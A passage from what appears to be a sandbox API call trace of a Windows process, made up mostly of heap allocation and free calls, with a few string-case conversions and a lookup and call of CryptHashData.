hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0250.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0250.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0250.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0250.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0250.007] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0250.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0250.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0250.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0250.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0250.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b13c8 [0250.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0250.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0250.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0250.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0250.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0250.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0250.009] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0250.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0250.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0250.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0250.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0250.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0250.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0250.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1868 [0250.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0250.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0250.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0250.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0250.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1828, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0250.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0250.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1828 [0250.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0250.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.012] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.012] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.012] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.012] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0250.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.013] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0250.013] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.015] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0250.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0250.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0250.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x34aa700, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0250.016] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0250.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0250.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0250.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0250.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0250.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0250.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0250.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0250.017] CryptHashData (hHash=0xaa5920, pbData=0x24b13c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0250.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0250.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0250.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0250.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0250.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0250.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0250.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0250.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0250.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0250.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0250.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0250.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0250.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 